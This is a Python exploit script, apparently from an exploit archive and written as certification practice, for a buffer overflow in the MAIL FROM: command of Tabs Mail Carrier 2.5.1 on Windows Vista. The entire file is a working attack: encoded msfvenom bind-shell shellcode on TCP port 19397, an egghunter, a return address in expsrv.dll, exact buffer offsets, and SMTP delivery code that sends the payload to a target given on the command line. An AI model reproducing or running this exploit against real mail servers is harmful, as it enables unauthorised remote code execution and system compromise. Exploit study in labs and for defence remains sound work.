# Exploit Title: Tabs Mail Carrier 2.5.1 MAIL FROM: Buffer Overflow
# Date: March 14, 2019
# Exploit Author: Joseph McDonagh
# Vendor Homepage: N/A
# Software Link: N/A
# Version: Mail Carrier 2.5.1
# Tested on: Windows Vista Home Basic SP2
# CVE: None


#!/usr/bin/python
# NOTE: a shebang only takes effect when it is the very first line of the file;
# with the header block above it, run the script as "python tabs_mail.pwn.py <target>".
#
# This script started from PWK, Chapter 6
# I am re-purposing it Tabs Mail Carrier 2.5.1 OSCE practice
# During testing, I found the MAIL FROM: is also vulnerable to Buffer Overflow
# Thanks to the original authors of the EHLO-parameter exploit, which gave me the
# starting point and nudge I needed.
#
# Usage ./tabs_mail.pwn.py 192.168.1.66
# Bind shell on TCP port 19397
# Tested on Windows Vista Home Basic SP 2

import sys
import socket
import time

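# ---------------------------------------------------------------------------
# Payload constants
# ---------------------------------------------------------------------------
# Everything that goes on the wire is built as bytes so the script behaves the
# same under Python 2 and Python 3 (socket.send() requires bytes on 3.x).

# Return address: overwrites EIP with a CALL EBX gadget in
# C:\Windows\System32\expsrv.dll (0x0f9c32b1, written little-endian).
# The address is per the author's testing on Vista Home Basic SP2; it is
# module/build specific and must be re-verified on any other target.
callebx = b"\xb1\x32\x9c\x0f"
sled = b"\x90" * 8      # 8-byte NOP sled
egg = b"T00WT00W"       # egg tag the hunter looks for (4-byte tag, twice in a row)

# Payload = egg tag followed by the bind-shell shellcode.
pay = egg

# msfvenom -p windows/shell_bind_tcp LPORT=19397 -b='\x00' -e x86/shikata_ga_nai -f py | sed 's/buf/pay/g'
# [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# [-] No arch selected, selecting arch: x86 from the payload
# Found 1 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)
# x86/shikata_ga_nai chosen with final size 355
# Payload size: 355 bytes
# Final size of py file: 1710 bytes
#
# Bind shell on TCP/19397; encoded with \x00 excluded as a bad character.
pay += b"\xd9\xe9\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x53\xbe\x8c"
pay += b"\x69\xbd\xa0\x31\x72\x17\x03\x72\x17\x83\x4e\x6d\x5f"
pay += b"\x55\xb2\x86\x1d\x96\x4a\x57\x42\x1e\xaf\x66\x42\x44"
pay += b"\xa4\xd9\x72\x0e\xe8\xd5\xf9\x42\x18\x6d\x8f\x4a\x2f"
pay += b"\xc6\x3a\xad\x1e\xd7\x17\x8d\x01\x5b\x6a\xc2\xe1\x62"
pay += b"\xa5\x17\xe0\xa3\xd8\xda\xb0\x7c\x96\x49\x24\x08\xe2"
pay += b"\x51\xcf\x42\xe2\xd1\x2c\x12\x05\xf3\xe3\x28\x5c\xd3"
pay += b"\x02\xfc\xd4\x5a\x1c\xe1\xd1\x15\x97\xd1\xae\xa7\x71"
pay += b"\x28\x4e\x0b\xbc\x84\xbd\x55\xf9\x23\x5e\x20\xf3\x57"
pay += b"\xe3\x33\xc0\x2a\x3f\xb1\xd2\x8d\xb4\x61\x3e\x2f\x18"
pay += b"\xf7\xb5\x23\xd5\x73\x91\x27\xe8\x50\xaa\x5c\x61\x57"
pay += b"\x7c\xd5\x31\x7c\x58\xbd\xe2\x1d\xf9\x1b\x44\x21\x19"
pay += b"\xc4\x39\x87\x52\xe9\x2e\xba\x39\x66\x82\xf7\xc1\x76"
pay += b"\x8c\x80\xb2\x44\x13\x3b\x5c\xe5\xdc\xe5\x9b\x0a\xf7"
pay += b"\x52\x33\xf5\xf8\xa2\x1a\x32\xac\xf2\x34\x93\xcd\x98"
pay += b"\xc4\x1c\x18\x34\xcc\xbb\xf3\x2b\x31\x7b\xa4\xeb\x99"
pay += b"\x14\xae\xe3\xc6\x05\xd1\x29\x6f\xad\x2c\xd2\xc4\xeb"
pay += b"\xb8\x34\xb0\xe3\xec\xef\x2c\xc6\xca\x27\xcb\x39\x39"
pay += b"\x10\x7b\x71\x2b\xa7\x84\x82\x79\x8f\x12\x09\x6e\x0b"
pay += b"\x03\x0e\xbb\x3b\x54\x99\x31\xaa\x17\x3b\x45\xe7\xcf"
pay += b"\xd8\xd4\x6c\x0f\x96\xc4\x3a\x58\xff\x3b\x33\x0c\xed"
pay += b"\x62\xed\x32\xec\xf3\xd6\xf6\x2b\xc0\xd9\xf7\xbe\x7c"
pay += b"\xfe\xe7\x06\x7c\xba\x53\xd7\x2b\x14\x0d\x91\x85\xd6"
pay += b"\xe7\x4b\x79\xb1\x6f\x0d\xb1\x02\xe9\x12\x9c\xf4\x15"
pay += b"\xa2\x49\x41\x2a\x0b\x1e\x45\x53\x71\xbe\xaa\x8e\x31"
pay += b"\xce\xe0\x92\x10\x47\xad\x47\x21\x0a\x4e\xb2\x66\x33"
pay += b"\xcd\x36\x17\xc0\xcd\x33\x12\x8c\x49\xa8\x6e\x9d\x3f"
pay += b"\xce\xdd\x9e\x15"

# 32-byte egghunter (int 0x2e / NtAccessCheckAndAuditAlarm page-walker).  The
# embedded "T00W" (\x54\x30\x30\x57) is the tag it scans for; execution jumps
# to the byte right after the second copy of the tag, i.e. the shellcode.
egghunter = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef"
    b"\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# Buffer layout (offsets into the MAIL FROM: argument).
EIP_OFFSET = 5088       # bytes before the saved return address is overwritten
PAYLOAD_OFFSET = 700    # where egg + shellcode sit inside the leading "A" filler
EBX_REGION_LEN = 516    # "C" bytes between the first sled and the hunter
TOTAL_LEN = 5900        # total length the author sends


def build_buffer(total_len=TOTAL_LEN):
    """Return the MAIL FROM: argument (bytes) that triggers the overflow.

    Layout (offset -> content):
        0     "A" filler
        700   egg tag + bind-shell shellcode (located later by the egghunter)
        ...   "B" filler up to 5088
        5088  return address: CALL EBX in expsrv.dll
        5092  8-byte NOP sled (5100 mark)
        5100  516 x "C" -- per the author's notes this is the region EBX points at
        5616  8-byte NOP sled
        5624  32-byte egghunter
        5656  "D" padding up to total_len

    Args:
        total_len: overall size of the argument; the original sends 5900.
            If the fixed part already exceeds it, no "D" padding is added.
    """
    parts = [
        b"A" * PAYLOAD_OFFSET,
        pay,
        b"B" * (EIP_OFFSET - (PAYLOAD_OFFSET + len(pay))),
        callebx,        # overwrite EIP with CALL EBX in C:\Windows\System32\expsrv.dll
        sled,           # 5100 bytes mark
        b"C" * EBX_REGION_LEN,
        sled,           # NOPs in front of the hunter
        egghunter,
    ]
    buf = b"".join(parts)
    return buf + b"D" * max(0, total_len - len(buf))


# Module-level name kept for compatibility with the original flat script.
buffer = build_buffer()


def send_exploit(ipaddr, port=25, timeout=10.0):
    """Deliver the overflow over SMTP.

    Args:
        ipaddr:  target host (IP or name).
        port:    SMTP port, default 25.
        timeout: socket timeout in seconds so the script never hangs on a
                 service that wedges instead of crashing.

    Returns:
        True if the malicious MAIL FROM: line was sent, False if the
        connection or handshake failed before that point.
    """
    print("[-] Attacking Tab MailC Carrier MAIL FROM: with %s bytes" % len(buffer))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        try:
            s.connect((ipaddr, port))           # connect to IP & SMTP port
            s.recv(1024)                        # receive banner
            s.send(b"EHLO root@localhost\r\n")  # SMTP lines are CRLF-terminated
            s.recv(1024)                        # receive reply
            s.send(b"MAIL FROM: " + buffer + b"\r\n")  # send the phony MAIL FROM
        except socket.error as e:
            print("[-] Could not deliver payload to %s:%s: %s" % (ipaddr, port, e))
            return False

        # Once the overflow lands the service is expected to crash (or hang);
        # a reset/timeout here is the normal outcome, not a delivery failure.
        try:
            s.recv(1024)
            s.send(b"RCPT TO: evelyn@evelyn\r\n")
            s.send(b"QUIT\r\n")
        except socket.error:
            pass
    finally:
        s.close()
    time.sleep(1)
    print("[-] Done!")
    return True


def main(argv=None):
    """Command-line entry point: tabs_mail.pwn.py <target addr> [port]."""
    argv = sys.argv if argv is None else argv
    if len(argv) < 2:
        print("[-]Usage: %s <target addr> [port]" % argv[0])
        sys.exit(1)     # usage error is a failure, not success
    ipaddr = argv[1]
    port = int(argv[2]) if len(argv) > 2 else 25
    if not send_exploit(ipaddr, port):
        sys.exit(1)


if __name__ == "__main__":
    main()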